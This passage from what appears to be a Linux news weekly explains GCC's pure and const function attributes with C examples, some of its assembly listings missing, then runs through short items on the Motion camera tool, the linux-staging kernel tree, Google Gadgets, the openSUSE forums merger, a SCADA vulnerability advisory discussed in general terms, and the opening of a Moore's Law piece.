      function that does not access global memory, but only its
      parameters, is called a constant function. This is because the
      function, being unrelated to the state of global memory, will
      always return the same value when given the same parameters. The
      return value is thus derived directly and exclusively from the
      values of the parameters given.
    
      The way a constant function "consumes" pointers is very
      different from the way other functions do: it can handle them as
      both parameter and return value only if they are never
      dereferenced, for accessing the memory they are referencing
      would be a global memory access, which breaks the requirements
      of constant functions.
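As a sketch (the names are hypothetical), both functions below qualify as constant: the first works on integers only, and the second accepts and returns a pointer but never dereferences it.

```c
#include <stddef.h>

int clamp_percent(int value) __attribute__((const));
const char *advance(const char *base, size_t offset) __attribute__((const));

/* Uses nothing but the value of its parameter. */
int clamp_percent(int value)
{
    if (value < 0)
        return 0;
    if (value > 100)
        return 100;
    return value;
}

/* Pointer arithmetic only: the pointed-to memory is never read, so no
 * global memory access takes place. */
const char *advance(const char *base, size_t offset)
{
    return base + offset;
}
```

Had advance() looked at base[offset] instead of just computing the address, it could be pure at best.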
    
      Of course these requirements have to apply not only to the
      operations in the given function, but also recursively to all
      the functions it calls. A function can at best be of the same
      kind as the least restrictive kind of function it calls. So if
      it calls a normal function, it can only be a normal function
      itself; if it calls only pure functions, it can be either pure or
      normal, but not constant; and if it calls only constant
      functions, it can be constant.
    
      As with inlining, the compiler will be able
      to decide if a function is pure or constant, in case no
      attribute is attached to it, only if the function is
      static (with the exception of special cases for freestanding
      code and other advanced options). When a function is not static,
      even if it's local, the compiler will assume that the function
      can be overridden at link- or run-time so it will not make any
      assumption based on the body for the definition it may find.
    Optimizing Function Calls

      Why should developers bother with marking functions pure or
      constant, though? As I said, these two attributes tell the
      compiler something about the semantics of a function call, so
      that it can optimize more aggressively than it can with normal functions.
    
      There are two main optimizations that can be applied to these
      kinds of functions: CSE
      (Common Sub-expression Elimination) and
      DCE (Dead Code
      Elimination). We'll soon see in detail, with the help of the
      compiler itself, what these two consist of. Their names,
      however, are already rather explicit: CSE is
      used to avoid duplicating the same code inside a function,
      usually factoring out the code before branching or storing the
      results of common operations in temporary variables (registers
      or stack), while DCE will remove code that
      would never be executed or that would be executed but never
      used.
    
      These are both optimizations that can be implemented in the
      source code, to an extent, reducing the usefulness of declaring
      functions pure or constant. On the other hand, as I'll
      demonstrate, doing so often reduces the readability of the code
      by obscuring the actual algorithm in favor of making it
      faster. This does not apply to all cases, though; sometimes doing
      the optimization "manually", directly in the source code, makes
      it more readable, and makes the code resemble the output of
      the compiler more closely.
    
About Assemblers and Examples

	When talking about optimization, it's quite difficult to
	visualize the task of the compiler, and the way the code
	morphs from what you read in the C source code into what the
	CPU is really going to execute. For this reason, the best way
	to write about optimizations is to use examples, showing what the
	compiler generates starting from the source code.
      
	Given the way in which GCC works, this is actually quite
	easy. You just need to enable optimization and append the
	-S switch to the gcc
	command line. This switch stops the compiler after the
	transformation of C source code into assembly, before the
	result is passed to the assembler program to produce the
	object file.
      
	Although I suspect a good fraction of the people reading this article
	would be comfortable reading IA-32 or x86-64 assembly code, I
	decided to use the Blackfin
	[1]
	assembly language, which should be readable for people who
	have never studied a particular assembly language.
	
	The Blackfin assembler is more symbolic than IA-32: instead of
	having operations named movl and
	addq, the operations are identified by
	their algebraic operators (=,
	+), while the registers are merely called
	R1, R2 and so on.
      
	Calling conventions are also quite easy to understand: for all
	the cases we'll look through in the article (at most four
	parameters, integers or pointers), the parameters are passed
	through the registers, starting in order from
	R0. The return value of the function call
	is also stored in the R0 register.
      
	To clarify the examples which will appear later on, let's see
	how the following C source code is translated by GCC into
	Blackfin code:
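A hypothetical source of this kind (an illustration, with made-up names) would pass a string and a small integer constant to a function, store the result in a global variable, and return it, which touches each of the steps annotated below:

```c
/* Hypothetical global variable that receives the result. */
int result;

/* Hypothetical callee taking a pointer and a small integer. */
int somefunction(const char *label, int value);

int caller(void)
{
    /* A string address and an integer constant are the two arguments;
     * the return value is stored in global memory. */
    result = somefunction("example", 42);

    /* The stored value is handed back to our own caller. */
    return result;
}

/* Defined here only so that the sketch links on its own. */
int somefunction(const char *label, int value)
{
    return label[0] + value;
}
```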
      
	becomes:
      
 
	    As the Blackfin does not have 32 bit immediate load, you
	    have to load high and low addresses separately (in
	    whichever order); the assembler will take care of properly
	    loading the high 16 bits of the label to the upper
	    part of the register, and the low 16 bits to the lower part.
	  
	    Once the parameters are loaded, the function is called
	    almost identically to any other call
	    operation on other architectures; note the prefixed
	    underscore on symbols' names.
	  
	    Integers, whether constants, parameters or variables, are
	    also loaded into registers for calls. Blackfin doesn't
	    have 32 bit immediate loading, but if the constant to load
	    fits into 16 bits, it can be loaded through sign extension
	    by appending the (X) suffix.
	  
	    When accessing a global memory location, the
	    P2 pointer is set to the address of the
	    memory location...
	  
	    ... and then dereferenced to assign that memory
	    area. Being a RISC architecture, Blackfin does not have
	    direct memory operations.
	  
	    The return value for a function is loaded into the
	    R0 register, and can be accessed from
	    there.
	  
	    The rts command is the return from
	    subroutine, and usually indicates the end of the function,
	    but like the return statement in C,
	    it might appear in any place of the routine.
	  

	In the following examples, the preambles with declarations and
	data will be omitted whenever these are not useful to the
	discussion.
      
	Concerning optimization levels, the code will almost
	always be compiled with at least the first optimization level
	enabled (-O1). This is both because it makes the code cleaner to
	read (using register-register copies for parameter passing,
	instead of saving to the stack and then restoring from that)
	and because we need optimization enabled to see how the
	optimizations are applied.
      
	Also, most of the time I'll refer to the
	fastest alternative. Most of what I say,
	though, applies also to the smaller
	alternative when using the -Os optimization level. In any
	case, the compiler always weighs the cost-to-benefit ratio
	between the optimized and the unoptimized version, or between
	different optimized versions. If you want to know the exact
	route the compiler takes for your code, you can always use the
	-S switch to find out.
      DCE and Unused Variables
	One area where DCE is useful
	is to avoid operations that result in unused data. It's
	not that uncommon that a variable is defined by an operation,
	complex or not, and is then never used by the code, either
	because it is intended for future expansion or because it's a
	remnant of older code that has been removed or replaced. While
	the best thing would be to get rid of the definition entirely,
	users expect the compiler to produce a good result with sloppy
	code too, and that operation should not be emitted.
      
	The DCE pass can remove all the code that
	has no side effect, when its result is not used. This includes
	all mathematical operations and functions known to be pure or
	constant (as neither are allowed to change the global state of
	the variables). If a function call is not known to be at least
	pure, it may change the global state, and its call will not be
	eliminated, as shown in the following code:
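A minimal sketch of such code, with hypothetical function names and with definitions added only so that it links on its own, might be:

```c
/* Hypothetical counter giving the impure function a visible side effect. */
int impure_calls = 0;

int someimpurefunction(int a, int b);
int somepurefunction(int a, int b) __attribute__((pure));

int testfunction(int a, int b, int c)
{
    int res1 = someimpurefunction(a, b); /* unused, but the call must stay */
    int res2 = somepurefunction(b, c);   /* unused, the call may be dropped */
    int res3 = a + b - c;                /* unused, the arithmetic may be dropped */

    /* Silence unused-variable warnings without using the values. */
    (void)res1;
    (void)res2;
    (void)res3;
    return a;
}

int someimpurefunction(int a, int b)
{
    impure_calls++;
    return a + b;
}

int somepurefunction(int a, int b)
{
    return a * b;
}
```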
      
	Which, once compiled with -O1,
	[2]
	produces the following Blackfin assembler:
      
	As you can see, the call to the pure function has been
	eliminated (the res2 variable was not being
	used), together with the algebraic operation, but the impure
	function, despite having its return value discarded, is still
	called. The compiler emits that call because it does not
	know whether the function has side
	effects on the global memory state or not.
      
	This is equivalent to the following code (which
	produces the same assembler code):
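A sketch of that equivalent source, keeping only the call that may have a side effect, could be the following; someimpurefunction() and the counter are hypothetical names.

```c
/* Hypothetical counter giving the impure function a visible side effect. */
int impure_calls = 0;

int someimpurefunction(int a, int b);

int testfunction(int a, int b, int c)
{
    (void)c;                  /* no longer needed once the dead code is gone */
    someimpurefunction(a, b); /* kept for its possible side effects */
    return a;
}

/* Defined here only so that the sketch links on its own. */
int someimpurefunction(int a, int b)
{
    impure_calls++;
    return a + b;
}
```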
      
	The Dead Code Elimination optimization can be very helpful to
	reduce the overhead caused by code written to conform to the C89
	standard, where you couldn't mix variable (and constant)
	declarations with executable code.
      
	In those sources, you had to declare variables at the top of
	the function, and then start to check for prerequisites. If
	you wanted to make it explicit that some variable had to keep
	its value, by making it constant, you would often have to fill
	it before the prerequisites could be checked.
      
	Legacy code aside, DCE is also useful when
	writing debug code, since it avoids cluttering the source with
	lots of #ifdef directives. Take
	for instance the following code:
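What follows is a sketch under stated assumptions: the assert_se definition shown is one common way of writing such a macro, and dosomethinginternal() along with the bodies of the helper functions are hypothetical, added only so that the example builds on its own.

```c
#include <assert.h>
#include <string.h>

/* Unlike assert(), assert_se() still evaluates its argument when
 * debugging is disabled with NDEBUG. */
#ifdef NDEBUG
# define assert_se(expr) ((void)(expr))
#else
# define assert_se(expr) assert(expr)
#endif

const char *getsomestring(int code) __attribute__((pure));
int dosomethinginternal(int code, int value);

int dosomething(int code, int value)
{
    const char *string = getsomestring(code);

    /* Debug-only sanity check on the prefix of the string. */
    assert_se(strncmp(string, "something", strlen("something")) == 0);

    return dosomethinginternal(code, value);
}

/* Hypothetical lookup: reads a constant table, writes nothing. */
const char *getsomestring(int code)
{
    static const char *const table[] = { "something", "something else" };

    return table[code & 1];
}

/* Hypothetical worker standing in for the real processing. */
int dosomethinginternal(int code, int value)
{
    return code + value;
}
```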
      
	The assert_se macro has different
	behavior from the standard assert, as it
	has side effects, which basically means that the code passed
	to the assertion is called even though the compiler is told to
	disable debugging. This is a somewhat common trick, although
	its effects on readability are debatable.
      
	With getsomestring() pure, when compiling
	without debugging, the DCE will remove the calls to all three
	functions: getsomestring(),
	strncmp() and
	strlen() (the latter two are usually
	declared as pure by both the C library and by GCC's built-in
	replacements). This is because none of these functions has a
	side effect, resulting in a very short function:
      
	If our getsomestring() function weren't
	pure, even though its return value is not going to be used,
	the compiler would have to emit the call, resulting in rather
	more complex (albeit still simple, compared with most
	real-world functions) assembler code:
      
	Common Sub-expression Elimination
      
	The Common Sub-expression Elimination optimization is one of
	the most important optimizations performed by the compiler,
	because it's the one that, for instance, replaces multiple
	indexed accesses to an array so that the actual memory address
	is calculated just once.
      
	This optimization finds common operations
	executed on the same operands (even when they are not known at
	compile-time), decides which ones are more expensive than
	saving the result in a temporary (register or stack), and then
	swaps the code around to take the cheapest course.
      
	While its uses are quite varied, one of the easiest ways to
	see the work of the CSE is to look at the
	code generated when using the ternary if
	operator. Let's take the following code:
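A minimal sketch of such code, with hypothetical function names and with definitions added only so that it links on its own, might be:

```c
/* Hypothetical counter giving the impure function a visible side effect. */
int impure_calls = 0;

int someimpurefunction(int a, int b);
int somepurefunction(int a, int b) __attribute__((pure));

int testfunction(int a, int b, int c, int d)
{
    /* Each ternary names the same call twice. */
    int res1 = someimpurefunction(a, b) ? someimpurefunction(a, b) : c;
    int res2 = somepurefunction(a, b) ? somepurefunction(a, b) : d;

    return res1 + res2;
}

int someimpurefunction(int a, int b)
{
    impure_calls++;
    return a + b;
}

int somepurefunction(int a, int b)
{
    return a * b;
}
```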
      
	The compiler will optimize the code as:
      
	As you can see, the pure function is called just once, because the
	two references inside the ternary operator are equivalent,
	while the other one is called twice. This is because there was
	no change to global memory known to the compiler between the
	two calls of the pure function (the function itself couldn't
	change it – note that the compiler will never take
	multi-threading into account, even when asking for it
	explicitly through the -pthread flag),
	while the non-pure function is allowed to change global memory
	or use I/O operations.
      
	The equivalent code in C would be something along the
	following lines (it differs a bit because the compiler will
	use different registers):
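A sketch of that hand-optimized form, again with hypothetical function names, stores the result of the pure call in a temporary while leaving both calls to the impure function in place:

```c
/* Hypothetical counter giving the impure function a visible side effect. */
int impure_calls = 0;

int someimpurefunction(int a, int b);
int somepurefunction(int a, int b) __attribute__((pure));

int testfunction(int a, int b, int c, int d)
{
    /* The impure call cannot be merged: it may change global state. */
    int res1 = someimpurefunction(a, b) ? someimpurefunction(a, b) : c;

    /* The pure call is made once and its result reused. */
    const int tmp = somepurefunction(a, b);
    int res2 = tmp ? tmp : d;

    return res1 + res2;
}

int someimpurefunction(int a, int b)
{
    impure_calls++;
    return a + b;
}

int somepurefunction(int a, int b)
{
    return a * b;
}
```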
      
	The Common Sub-expression Elimination optimization is very
	useful when writing long and complex mathematical
	operations. The compiler can find common calculations even
	though they don't look common to the naked eye, and act on
	those.
      
	Although sometimes you can get away with using multiple
	constants or variables to carry out temporary operations so
	that they can be re-used in the following calculations,
	leaving the formulae entirely explicit is usually more
	readable, as long as the formulae are not intended to change.
      
	Like with other algorithms, there are some advantages to
	reducing the source code used to calculate the same thing; for
	instance you can easily make a change directly to the
	definition of a constant and get the change propagated to all
	the uses of that constant. On the other hand, this can be
	quite a problem if the meaning of two calculations is very
	different (and thus can vary in different ways with the
	evolution of the code), and just happen to be calculated in
	the same way at a given time.
      
	Another rather useful place where the compiler can further
	optimize code with CSE, where it wouldn't be so nice or simple
	to do manually in the source code, is where you deal with
	static functions that are inlined by the compiler.
      
	Let's examine the following code for instance:
      
	In this code, you can find four basic expressions:
	(p1 * 16), (p2 *
	16), (3 &lt;&lt; a) and
	(4 &lt;&lt; b). Each of these four
	expressions is used twice in the
	somefunc() function. Thanks to the CSE,
	though, the code will calculate each of them once, even
	though they cross the function boundary, producing the
	following code:
      
	As you can easily see (the assembly was modified a bit to
	improve its readability, the compiler re-ordered loads of
	registers to avoid pipeline stalls, making it harder to see the
	point), the four expressions are calculated first, and stored
	respectively in the registers R0,
	R1, R7 and
	R3.
      
	These kinds of sub-expressions are usually harder to see in
	the code and also harder to implement. Sometimes they get
	factored out into a parameter of their own, but that can be more
	expensive during execution, depending on the calling conventions
	of the architecture.
      Cheats
	As I wrote above, there are some requirements that apply to
	functions that are declared pure and constant, related to not
	changing or accessing global memory; not executing I/O
	operations; and, of course, not calling further impure
	functions. The reason for this is that the compiler will
	accept what the user declares the function to be, whatever its
	body is (as it's usually unknown by the compiler at the call
	stage).
      
	Sometimes, though, it's possible to fool the compiler so that
	it treats impure functions as pure or even constant
	functions. Although this is a risky endeavor, as it might
	truly cause bad code generation by the compiler, it can
	sometimes be used to force optimization for particular
	functions.
      
	An example of this can be a lookup function that scans through
	a global table to return a value. While it is accessing global
	memory, you might want the compiler to promote it to a
	constant function, rather than simply to a pure one.
      
	Let's take for instance the following code:
      
	If the lookup() function is only
	considered a pure function, as it is, adhering to the rules we
	talked about at the start of the article, it will be called
	three times in testfunction(), like this:
      
	Instead, we can trick the compiler by declaring the
	lookup() function as constant (the data
	it is reading is constant, after all, so at a given parameter
	it will always return the same result). If we do that, the
	three calls will have to return the same value, and the
	compiler will be able to optimize them as a single call:
      
	In addition to lookup functions on constant tables, this
	trick is useful with functions which read data from files or
	other volatile data, and cache it in a memory variable.
      
	Take for instance the following function that reads an
	environment variable:
      
	This is not truly a constant function, as its return value
	depends on the environment. Even so, assuming that the
	environment of the process is left untouched, its return value
	will never change between calls. Even though it will affect
	the global state of the program (as the
	cachedval static variable will be filled in
	the first time the function is called), it can be assumed to
	always return the same value.
      
	Tricking the compiler into thinking that a function is constant
	even though it has to load data through I/O operations, as I
	said, is risky, as the compiler will think there is no I/O
	operation going on; on the other hand, this trick might make a
	difference sometimes, as it allows the expression of functions
	in more semantic ways, leaving it up to the compiler to
	optimize the code with temporaries, where needed.
      
	One example can be the following code:
      Note:
	  To make sure that the compiler won't reduce the three
	  function calls to their return values right away, the static
	  sub-functions return values taken from global variables; the
	  meanings of those variables are not important.
	
	Considering the above source code, if
	get_testval() is impure, as the compiler
	will automatically find it to be, it will be compiled into:
      
	As you can see, the get_testval() is
	called twice, even though its result will be identical. If we
	declare it constant, instead, the code of our test function
	will be the following:
      
	The CSE pass combines the two calls to
	get_testval into one. Again, this is one
	of the optimizations that are harder to achieve by manually
	changing the source code since the compiler can have a larger
	view of the use of its value. A common way to handle this is
	by using global variables, but that might require one more
	load from the memory, while CSE can take care of keeping the
	values in registers or on the stack.
      Conclusions
      After what you have read about pure and constant functions, you
      might have some concerns about the average use of them. Indeed,
      in a lot of cases, these two attributes allow the compiler to do
      something you can easily achieve by writing better code.
    
      There are two objectives you have to keep in mind that are
      related to the use of these (and other) attributes. The first is
      code readability because sometimes the manually optimized
      functions are harder to read than what the compiler can
      produce. The second is allowing the compiler to optimize legacy
      or external code.
    
      While you might not be too concerned with letting legacy code or
      code written by someone else get away with slower execution, a
      pragmatic view of the current Free Software world should take
      into consideration the fact that there are probably thousands of
      lines of legacy code around.  Some of that code, written with
      pre-C99 declarations, might even be
      using 
      libraries that are being developed with their older interface,
      which could be improved by providing some extra semantic
      information to the compiler through use of attributes.
    
      Also, it's unfortunately true that extensive use of these
      attributes might be seen by neophytes as an easy solution to let
      sloppy code run at a decent speed. On the other hand, the same
      attributes could be used to identify such sloppy code through
      analysis of the source code.
    
      Although GCC does not issue warnings for all of these cases, it
      already warns for some of them, like unused variables, or
      statements without effect (both triggered by the
      DCE). In the future more warnings might be
      reported if pure and constant functions get misused.
    
      In general, like with many other GCC function attributes, their
      use is tightly related to how programmers perceive their
      task. Most pragmatic programmers would probably like these
      tools, while purists will probably dislike the way these
      attributes help sloppy code to run almost as fast as properly
      written code.
    
      My hope is that in the future better tools will make good use
      of these and other attributes on different levels than
      compilers, like static and dynamic analyzers.
    [1] 
	    The Blackfin architecture is a RISC architecture developed
	    by Analog Devices, supported by both GCC and Binutils (and
	    Linux, but I'm not interested in that here).
	  [2] 
	    I have chosen -O1 rather than -O2 because in the latter
	    case the compiler performs extra optimization passes that
	    I do not wish to discuss within the scope of this article.
	  

		Detect and record video movement with Motion


Motion
is a video application that monitors a video4linux device such as a
USB camera and records movement within the image:


Motion is a program that monitors the video signal from one or more cameras and is able to detect if a significant part of the picture has changed; in other words, it can detect motion.
The program is written in C and is made for the Linux operating system. Motion is a command line based tool whose output can be either jpeg, ppm files or mpeg video sequences.


An installation of Motion was performed on a machine with a 3GHz
Athlon 64 processor running Ubuntu 7.04 (Feisty Fawn).
The most recent version of Motion (v 3.2.10.1) was

downloaded; the file was then uncompressed and untarred.
The normal configure, make and make install steps were performed.
If one wishes to record mpeg movies, the libavcodec and libavformat
libraries must be installed prior to running configure.


The make install step needed a bit of manual intervention:
it was necessary to create the /var/run/motion directory and
copy the motion-dist.conf configuration file to
/usr/local/etc/motion.conf.  The config file was modified to
define a USB camera, set the camera's default resolution,
and set the destination directory for images.
The framerate parameter was lowered to 2 frames per second to slow down the
rate of accumulation of image files.


A Kensington Model 67015 VideoCAM VGA USB camera was plugged into
the computer.
It is a good idea to run a real-time video monitoring application such as
xawtv or
EffecTV (in DumbTV
mode) to adjust the camera's focus, brightness and contrast settings.
Running Motion was simply a matter of typing "motion"
on the command line.  The program takes about 25 seconds to start
recording movement; presumably most of this time is spent learning
the contents of the video.  After this delay, the software would
output a line of text and create one .jpg file for each movement
it detected.  The images were inspected with the

Mirage image viewer and a changing sequence of static images was
observed.


Motion has a wide variety of capabilities and configurable
parameters.  The

Motion Guide and

Config File Options are a good place to read about the
various capabilities and the

FAQ gives answers to common questions.


One can imagine a number of uses for Motion: cube farm denizens could
find out what is causing their pens to disappear at night, and people in high
crime areas could use it to catch vandals and thieves in the act.
The on_picture_save configuration directive can execute a command
each time a picture is saved; this could be used to copy captured images to
a distant web server for remote monitoring.
This feature was tested by adding a line like this:
on_picture_save scp %f remote-host:/directory-path
to the config file; the operation worked as expected.


It should be noted that inexpensive USB cameras may only work in a
very limited set of lighting conditions.  Serious surveillance
would require an NTSC or PAL video input adapter and a better
camera, or a high resolution webcam.


Apparently, there have been no major releases of Motion in a long
time, but the developers'

mail archive shows that recent work has been done on the project.
A new point release just showed up this week; it added a fix
for a security bug.


If you are looking for a way to do automated video surveillance,
Motion is an excellent tool for the job.


		A new kernel tree: linux-staging


There's a new kernel tree in town.  The linux-staging tree was announced by Greg Kroah-Hartman
on 10 June.  It is meant to hold drivers and other kernel patches that are
working their way toward the mainline, but still have a ways to go.  The
intention is to collect them all together in one tree to make access and
testing easier for interested developers.


According to Kroah-Hartman, linux-staging (or -staging as it will
undoubtedly 
be known) "is an outgrowth of the Linux Driver Project, and the fact
that
there have been some complaints that there is no place for individual
drivers to sit while they get cleaned up and into the proper shape for
merging."  Collecting the patches in one place will increase
their visibility in the kernel community, potentially attracting more
developers to assist in fixing, reviewing, and testing them.


The intent is for -staging to house self-contained
patches—Kroah-Hartman mentions drivers and filesystems—that
should not affect anyone who is not using them.  Because of that, he is
hoping that -staging can get included in the linux-next tree.  As he says to
Stephen Rothwell, maintainer of -next, in
the announcement:

Yes, I know it contains things that will not be included in the
     next release, but the inclusion and basic build testing that is
     provided by your tree is invaluable.  You can place it at the
     end, and if there is even a whiff of a problem in any of the
     patches, you have my full permission to drop them on the floor
     and run away screaming (and let me know please, so I can fix it
     up.)


The -next tree is meant for things that are headed for inclusion in the
"N+1" kernel (where 2.6.N is the release under development), so including
code not meant for that release is bending the rules a bit.  As of this
writing, Rothwell has not responded to the
request to include -staging, but it would clearly benefit those patches to
have a wider audience—with only a small impact on -next.  There is no
set timeline for patches to move from -staging into mainline, Kroah-Hartman
says: 

Based on some of the work that is needed on some of these drivers, it is
much longer than N+2, unless we have some people step up to help out
with the work.  It's almost all janitorial work to do, but I know I
personally don't have enough time to do it all, and can use the help.


The -staging tree is seen as a great place for Kernel Janitors and others
who are interested in learning about kernel development to get their
start.  The announcement notes: "The code in this tree
is in desperate need of cleanups and fixes that can be trivially
found using 'sparse' and 'scripts/checkpatch.pl'."  In the
process of cleaning up the code, folks can learn how to create patches and
how to get them accepted into a tree.  From there, the hope is that more
difficult tasks will be undertaken—with -staging or other kernel
code—leading to a new crop of kernel hackers.


The current status of -staging shows 17
patches, most of which are drivers from the Linux Driver Project.
Kroah-Hartman is actively encouraging more code to be submitted for
-staging, as long as it meets some criteria for the tree.  The tree is
not meant to be a dumping ground for drivers that are being "thrown
over the wall" in hopes that someone else will deal with them.  It is also
not meant for code that is being actively worked on by a group of
developers in another tree somewhere—the reiser4 filesystem is
mentioned as an 
example—it is for code that would otherwise languish.


The reaction on linux-kernel has so far been favorable, with questions
being asked 
about what kinds of patches are appropriate for the tree, in particular new architectures.  The -staging tree fills a
niche that has not yet been covered by other trees.  It also serves
multiple purposes, from giving new developers a starting point to providing
additional reviewing and testing opportunities for new drivers and other
code.  With luck, that will hasten the arrival of new features—along
with new developers.


		Google announces Gadgets for Linux


Google recently announced
the release of their Gadgets for the Linux desktop, and, unlike some of
their other
desktop offerings, they released it under a free software license.  While
it is not earth-shattering technology, Gadgets does provide some
interesting features and amusing diversions.  It also generates some hope
that Google is getting better at understanding what free software users are
looking for, so perhaps things like the Google Desktop for Linux will be
better integrated and more useful in the future.


Gadgets are a
cross-platform way to create simple applications that can run on web pages
and desktops.  The gadget API provides a means to retrieve content from
other sites and display it along with a user interface.  Many kinds of
applications can be created, from clocks and calendars to RSS feed readers
and "picture of the day" viewers.


There are numerous gadgets available; a semi-random collection on a KDE
desktop can be seen at left.  Google has created a handful of gadgets, but
the vast majority are available from others in various categories including
News, Sports, Finance, Fun and Games, Technology, and Communication.  The
gadget browser shown below, at right, allows easy access to an amazing
number of choices, many of which are variations on a theme.


To get started with gadgets, it is first necessary to build the tool.
Google does not yet provide .rpm or .deb files for various distributions.
The "how
to build" page was useful, but there was some difficulty in trying to
translate the dependencies 
into Fedora 9 package names.  A page
in a language I don't know needed no translation, however.  Linux commands,
it seems, are multi-lingual. 


Building from the Apache-licensed source tarball was straightforward after
that.  Gadgets for Linux comes in both 
GTK+ and Qt flavors, which allows for integration with the two dominant
Linux desktop environments.  The screenshots accompanying this article are
from the Qt version, but a brief look at the GTK+ version suggests it is roughly
the same, though the Qt version lacks the sidebar dock.


This is a beta release, perhaps more of a beta than many Google releases,
so there are still a fair number of glitches.  Perhaps 20% of the gadgets
tried had one problem or another, with some seeming not to function at
all.  Having no experience with gadgets on other platforms, it was not
clear whether these were caused by bugs in the gadgets themselves or the
desktop 
gadget program.


The main benefit of the gadget API seems to be the cross-platform
capabilities.  Gadgets can run—largely unchanged—on Linux, Mac OS
X, or Windows, but can also run in browsers on web pages at social
networking sites or on other pages.  If the API can deliver that wide a
range of platform choices, it could open up a much wider audience for folks
who want to develop their gadgets on Linux.


Still missing is one of the tools recommended for developing gadgets, Gadget
Designer, which is only available for Windows.  The documentation
for creating a gadget makes it look like a tedious exercise in XML
manipulation and Javascript programming, but there may be tools available
or in development to make some of that easier.


Overall, gadgets look like an interesting project.  There is really nothing
new about the kinds of applications that can be built using the API, but
there are few options for building those kinds of programs in a truly cross-platform way.
Google's choice to support Linux, and support it
well, accompanied by the release of the code under a
free software license is, perhaps, the best news of all.


		openSUSE merges forums ahead of 11.0 release


The openSUSE project announced this week it has merged its three largest English-language community support forums under one big green umbrella and relaunched them as the openSUSE Forums. According to data supplied by openSUSE, the combined number of suseforums.net, suselinuxsupport.de, and openSUSE Novell support forum members was in the tens of thousands, a number expected to rise with the upcoming release of openSUSE 11.0.
Even though the new forums are already up and running smoothly, the team has no intention of resting on its laurels. They're already working on implementing similar changes with forums in other languages and better integration with the rest of the site.
Project Manager Rupert Horstkötter says there are also plans for a "user-rating for the whole openSUSE community, integrated with forums.opensuse.org, and all other openSUSE services. Besides all of that, we hope to be able to attract more independent forum communities for the official openSUSE forums."
Keith Kastorff, the site admin for suseforums.net, says the idea began to take shape during an openSUSE project meeting back in 2007. "A big topic was the need for an 'official' openSUSE forum, and the duplication of effort, expertise, and resources we had in play," he recalls. "I volunteered to reach out to some of the independent SUSE focused forums to see if I could generate any interest in a merge." Then he contacted people involved with Novell and suselinuxsupport.de and "things moved forward from there."
Kastorff says getting the project underway was slow going at first and admits that some members were wary of Novell's involvement. "The open source community is sometimes skeptical of commercial players, but we found nothing but tremendous support from Novell," he says. 
It's not surprising that there were a number of technical hurdles to overcome in bringing the three forums together. One of the main issues was an inability to merge the member databases, and it was eventually decided to simply archive them within a section of the new forum. "Like any project, we had to make compromises to achieve the end goal," says Kastorff. "We knew going in we had different cultures in play, and there were times the dialogs between the various merging staffs got intense, but the team's strong commitment to bettering the openSUSE community kept us focused on the prize."
Indeed, it was a team effort. More than 30 people worked behind the scenes to import the help sections of the separate forums and archive over 400,000 posts prior to launching forums.opensuse.org. In order for the project to work, the various groups, each with their own goals and ideas, needed to work together and trust in the end goal. 
Horstkötter says it was "a lot of work to combine different cultures into one big forum for the openSUSE community, but it was a great time. I feel like I met some new friends during the project."
"We had three teams: one from Novell, two from different grassroots projects that had sprung up to serve the community and had developed their own style and ways of working together," recalls openSUSE Product Manager Michael Löffler. "To merge the three, the staff for each forum had to be comfortable putting all their eggs in one basket (Novell hosting the forums) and agreeing on a common set of rules, moderation guidelines, etc. It took some time and effort to work everything out, but I think that the three teams are working quite well together now."
Just as important as teams working together is the impact that merged forums will have on the openSUSE community overall. "Having a unified forum means that all interested users can converse and support one another in one location, so you don't have the duplication of effort," says Löffler. "I'm really glad [they] launched in time for 11.0; I expect that a lot of new users are going to be interested in openSUSE with this release, and I am very happy we have the forums to help support them."

		SCADA system vulnerabilities


Core Security released a security
advisory on 11 June that details a fairly pedestrian stack-based buffer
overflow vulnerability.  This is similar to hundreds or thousands of this
kind of flaw reported over the years except for one thing: it was found in
large industrial control systems for things like power and water utility
companies.   That there is a vulnerability is not surprising—there
are certainly many more—but it does give one pause
about the dangers of connecting these systems to the
internet. 


The bug was found in a Supervisory Control and Data
Acquisition—better known as SCADA—system and could be
exploited to execute arbitrary code.  Given that SCADA systems run much of
the world's infrastructure, an exploit of a vulnerable system could have
severe repercussions.  The customers of Citect, the company that makes the
affected systems, include "organizations in the aerospace, food,
manufacturing, oil and gas, and public utilities industries."


Makers of SCADA systems nearly uniformly tell their customers to keep those
systems isolated from the internet.  But as Core observes: "the
reality is that many organizations do have their process control networks
accessible from wireless and wired corporate data networks that are in turn
exposed to public networks such as the Internet."  So, the potential
for a random internet bad guy to take control of these systems does exist.


None of that should be particularly surprising when you stop to think about
it, but it is worrying.  Many SCADA systems—along with various
other 
control systems—were designed and developed long before the internet
started reaching homes and offices everywhere.  They were designed for
"friendly" environments, with little or no change for the hostile
environment that characterizes today's internet.  Also, as we have seen,
security rarely gets the attention it deserves until some kind of ugly
incident occurs.


Even for systems that were designed recently, there are undoubtedly
vulnerabilities, so it is a bit hard to believe that they might be
internet-connected.  According to the advisory, though, SCADA makers do not
necessarily require that the systems be physically isolated from the
network; instead, customers can "utilize technologies including firewalls
to keep them protected from improper external communications."


Firewalls—along with other security techniques—do provide a
measure of protection, but with the stakes so high, it would seem that more
caution is required.  It is probably convenient for SCADA users to be able
to connect to other machines on the LAN, as well as to the internet, but
with that convenience comes quite a risk.  Even systems that are just
locally connected could fall prey to a disgruntled employee exploiting a
vulnerability to gain access to systems they normally wouldn't have.


One can envision all manner of havoc that could be wreaked by a malicious
person (or government) who can take over the systems that control nuclear
power plants, enormous gas pipelines, or some chunk of the power grid.
Unfortunately, it will probably take an incident like that to force these
industries into paying as much attention to their computer security as they
do to their physical security.  


		The Kernel Hacker's Bookshelf: Ultimate Physical Limits of Computation


Moore's Law - we all know it (or at least think we do).

To be annoyingly exact, Moore's Law is a prediction that the number of
components per integrated circuit (for minimum cost per component)
will double every 24 months (revised up from every 12 months in the
original 1965 prediction).  In slightly more useful form, Moore's
Law is often used as a shorthand for the continuing exponential growth
of computing technology in many areas - disk capacity, clock speed,
random access memory.  Every time we approach the limit of some key
computer manufacturing technology, the same debate rages: Is this the
end of Moore's Law?  So far, the answer has always been no.
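
To get a feel for what a fixed doubling period implies, the prediction can be written as a one-line formula.  The sketch below is only an illustration: the function name and the default of one doubling every two years (the 24-month figure quoted above) are choices made here, not anything taken from Moore's own writing.

```python
def growth_factor(years, doubling_period_years=2.0):
    """Factor by which a quantity grows if it doubles every doubling_period_years."""
    return 2.0 ** (years / doubling_period_years)


# Ten years at one doubling every 24 months is five doublings.
print(growth_factor(10))        # 32.0
# The original 1965 figure of 12 months gives ten doublings instead.
print(growth_factor(10, 1.0))   # 1024.0
```

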